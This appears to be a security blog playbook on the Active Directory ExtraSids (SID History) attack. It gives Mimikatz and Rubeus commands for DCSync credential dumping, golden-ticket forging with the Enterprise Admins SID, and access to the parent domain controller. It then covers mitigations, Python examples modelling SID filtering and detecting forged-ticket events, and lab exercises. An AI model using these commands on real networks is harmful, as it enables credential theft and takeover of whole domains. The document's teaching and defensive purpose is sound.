ExtraSids Attacks: SID History Exploitation

Overview

The ExtraSids attack is a technique that allows an attacker to compromise a parent domain from a compromised child domain within the same Active Directory Forest. This playbook provides a comprehensive guide for understanding, executing, and defending against this attack.

Key Concepts

  • SID History: An attribute used in migration scenarios to retain a user’s original SID when moved to a new domain.
  • SID Filtering: A trust-level protection that strips SIDs belonging to other domains (including SID History entries) from the authentication data crossing a trust. It is enabled by default on external and forest trusts but not on the parent–child trusts inside a forest, which is why this attack works.
  • Golden Ticket: A forged Kerberos ticket granting unrestricted access within an Active Directory domain.

Prerequisites

To perform the ExtraSids attack, the following information is required:

  1. KRBTGT hash for the child domain
  2. SID of the child domain
  3. Name of a target user in the child domain (can be non-existent)
  4. FQDN of the child domain
  5. SID of the Enterprise Admins group of the root domain

Attack Execution

Step 1: Gather Required Information

  1. Obtain the KRBTGT account’s NT hash using DCSync:
     mimikatz # lsadump::dcsync /user:CHILD_DOMAIN\krbtgt
  2. Get the child domain SID:
     PS C:\> Get-DomainSID
  3. Obtain the Enterprise Admins group SID (read it from the objectsid property of the returned group):
     PS C:\> Get-DomainGroup -Domain PARENT_DOMAIN -Identity "Enterprise Admins"

Step 2: Create Golden Ticket

Using Mimikatz:

mimikatz # kerberos::golden /user:hacker /domain:CHILD_DOMAIN /sid:CHILD_DOMAIN_SID /krbtgt:KRBTGT_HASH /sids:ENTERPRISE_ADMINS_SID /ptt

Using Rubeus:

Rubeus.exe golden /rc4:KRBTGT_HASH /domain:CHILD_DOMAIN /sid:CHILD_DOMAIN_SID /sids:ENTERPRISE_ADMINS_SID /user:hacker /ptt

Step 3: Verify Ticket Creation

PS C:\> klist

Step 4: Exploit Access

Test access by performing actions such as listing the C: drive of the parent domain’s DC or executing a DCSync attack:

PS C:\> ls \\PARENT_DC\c$

mimikatz # lsadump::dcsync /user:PARENT_DOMAIN\target_user

Mitigation Strategies

  1. Implement SID Filtering (trust quarantine) on trust relationships so that SIDs from outside the trusted domain are stripped from tickets crossing the trust
  2. Regularly audit and monitor privileged accounts
  3. Adopt the Enhanced Security Administrative Environment (ESAE) architecture
  4. Implement comprehensive security controls and conduct regular audits
  5. Consider implementing a “Red Forest” architecture
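To make the first mitigation concrete, here is a small model of what SID filtering does to the ExtraSids carried across a trust. This is an added example, not code from the original playbook and not Windows' own implementation: it assumes a filter that keeps only SIDs whose domain part equals the trusted (child) domain's SID, and it covers only S-1-5-21 domain SIDs (the real filter also removes a set of well-known SIDs). The domain SIDs are constructed.

```python
"""Model of SID filtering (trust quarantine) applied to the extra SIDs a
child domain presents to its parent.  Added example; assumes the filter
keeps only SIDs from the trusted domain.  All SIDs are constructed."""

import re

# Only S-1-5-21-<three sub-authorities>-<RID> SIDs are modelled here.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-\d+$")

# Constructed sample domain SIDs (no real environment).
CHILD_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
PARENT_DOMAIN_SID = "S-1-5-21-4444444444-5555555555-6666666666"

# Well-known RIDs whose appearance in ExtraSids is what the attack relies on.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}


def domain_part(sid):
    """Everything but the RID, i.e. the domain identifier of the SID."""
    if not SID_RE.match(sid):
        raise ValueError(f"not a domain SID: {sid}")
    return sid.rsplit("-", 1)[0]


def rid(sid):
    """Relative identifier (last component) of a domain SID."""
    return int(sid.rsplit("-", 1)[1])


def apply_sid_filter(extra_sids, trusted_domain_sid, filtering_enabled):
    """Return (kept, dropped) for SIDs arriving over a trust from trusted_domain_sid.

    With filtering disabled (the intra-forest default) everything passes.
    With filtering enabled only SIDs of the trusted domain itself survive.
    """
    if not filtering_enabled:
        return list(extra_sids), []
    kept, dropped = [], []
    for sid in extra_sids:
        (kept if domain_part(sid) == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def privileged_foreign_sids(kept, trusted_domain_sid):
    """SIDs that survived, belong to another domain, and carry a privileged RID."""
    return [s for s in kept
            if domain_part(s) != trusted_domain_sid and rid(s) in PRIVILEGED_RIDS]


def simulate(filtering_enabled):
    """Run the forged-PAC scenario: a child user SID plus the root Enterprise Admins SID."""
    extra = [CHILD_DOMAIN_SID + "-1105", PARENT_DOMAIN_SID + "-519"]
    kept, dropped = apply_sid_filter(extra, CHILD_DOMAIN_SID, filtering_enabled)
    return {
        "kept": kept,
        "dropped": dropped,
        "privileged_foreign": privileged_foreign_sids(kept, CHILD_DOMAIN_SID),
    }


if __name__ == "__main__":
    for enabled in (False, True):
        print(f"SID filtering enabled={enabled}: {simulate(enabled)}")
```

Run with filtering disabled, the parent's Enterprise Admins SID (RID 519) reaches the parent DC intact; with filtering enabled it is dropped before any authorization decision is made. On Windows the setting itself is toggled per trust with netdom trust TRUSTING_DOMAIN /domain:TRUSTED_DOMAIN /quarantine:Yes.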

Detection Methods

  1. Monitor for unusual SID History modifications
  2. Look for unexpected domain controller impersonation
  3. Implement advanced threat detection solutions for Active Directory
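The first two detection items can be turned into a concrete log pass. The following is an added example, not code from the original playbook: it scans constructed Windows Security events for a populated SID History field in Event ID 4738 ("A user account was changed") and for Kerberos logons (Event ID 4624) whose account domain does not match the domain of the SID, a common artefact of forged tickets. The event dicts mimic the field names of the Windows event XML as a SIEM normaliser would return them; the domain SIDs, NetBIOS names and user names are made up, and the domain-mismatch rule is a heuristic rather than a definitive indicator.

```python
"""Detection pass over constructed Security events for SID History changes
(4738) and account/SID domain mismatches on Kerberos logons (4624).
Added example; field names follow the Windows event XML, all values are
constructed, and the domain-mismatch check is a heuristic."""

# Constructed mapping: domain SID prefix -> expected NetBIOS name.
DOMAIN_NETBIOS = {
    "S-1-5-21-1111111111-2222222222-3333333333": "CHILD",
    "S-1-5-21-4444444444-5555555555-6666666666": "PARENT",
}
PRIVILEGED_RIDS = {512, 518, 519}   # Domain Admins, Schema Admins, Enterprise Admins


def sid_domain(sid):
    """Domain identifier of an S-1-5-21 SID (the SID without its RID)."""
    return sid.rsplit("-", 1)[0]


def sid_rid(sid):
    return int(sid.rsplit("-", 1)[1])


def check_sid_history_change(ev):
    """4738: a populated SID History is rare outside migrations; note foreign/privileged SIDs."""
    hist = ev.get("SidHistory", "-")
    if hist == "-":
        return None
    reasons = ["SID History populated"]
    account_dom = sid_domain(ev["TargetSid"])
    for sid in hist.replace(",", " ").split():
        if not sid.startswith("S-1-5-21-"):
            continue
        if sid_domain(sid) != account_dom:
            reasons.append(f"foreign domain SID {sid}")
        if sid_rid(sid) in PRIVILEGED_RIDS:
            reasons.append(f"privileged RID {sid_rid(sid)}")
    return "; ".join(reasons)


def check_logon_domain_mismatch(ev):
    """4624 Kerberos logon whose TargetDomainName is not the NetBIOS name of the SID's domain.

    Heuristic (assumption): forged tickets often present an FQDN or blank domain here.
    """
    if ev.get("AuthenticationPackageName") != "Kerberos":
        return None
    expected = DOMAIN_NETBIOS.get(sid_domain(ev["TargetUserSid"]))
    actual = ev.get("TargetDomainName", "")
    if expected and actual.upper() != expected:
        return f"account domain '{actual}' does not match SID domain {expected}"
    return None


CHECKS = {4738: check_sid_history_change, 4624: check_logon_domain_mismatch}


def scan(events):
    """Return (EventID, TargetUserName, reason) for every event a check flags."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev["EventID"])
        reason = check(ev) if check else None
        if reason:
            findings.append((ev["EventID"], ev["TargetUserName"], reason))
    return findings


# Constructed sample events (two benign, two that should be flagged).
SAMPLE_EVENTS = [
    {"EventID": 4738, "TargetUserName": "svc_migrate",
     "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-1105",
     "SidHistory": "-"},                                               # benign: no SID History
    {"EventID": 4738, "TargetUserName": "jdoe",
     "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-1106",
     "SidHistory": "S-1-5-21-4444444444-5555555555-6666666666-519"},  # parent EA SID injected
    {"EventID": 4624, "TargetUserName": "alice", "TargetDomainName": "CHILD",
     "TargetUserSid": "S-1-5-21-1111111111-2222222222-3333333333-1107",
     "AuthenticationPackageName": "Kerberos"},                         # benign
    {"EventID": 4624, "TargetUserName": "hacker", "TargetDomainName": "child.corp.local",
     "TargetUserSid": "S-1-5-21-1111111111-2222222222-3333333333-500",
     "AuthenticationPackageName": "Kerberos"},                         # FQDN where NetBIOS expected
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Event ID 4742 ("A computer account was changed") carries the same SID History field and can be fed to check_sid_history_change unchanged; in a real deployment the NetBIOS mapping would come from the directory rather than a hard-coded table.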

Additional Resources

  1. The Hacker Recipes – Trusts
  2. Atomic Red Team – SID-History Injection
  3. Defending Against Golden Ticket Attacks
  4. Understanding DCSync Attacks
  5. Comprehensive Domain Trust Exploitation Guide
  6. SID History Injection Exposure

Practical Exercises

  1. Set up a lab environment with a parent and child domain. Compromise the child domain and perform the ExtraSids attack.
  2. Implement SID Filtering on the trust between domains and attempt the attack again to observe mitigation effectiveness.

Remember to use this playbook for educational and authorized testing purposes only. Always obtain proper permissions before conducting security assessments in production environments.

For more insightful and engaging write-ups, visit kosokoking.com and stay ahead in the world of cybersecurity!
